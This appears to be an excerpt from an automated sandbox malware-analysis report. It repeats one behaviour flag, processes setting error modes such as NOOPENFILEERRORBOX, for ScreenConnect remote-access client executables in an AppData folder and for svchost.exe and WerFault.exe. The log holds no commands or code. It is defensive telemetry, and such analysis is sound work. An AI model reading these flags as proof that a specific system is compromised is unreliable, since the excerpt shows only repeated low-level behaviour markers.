Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
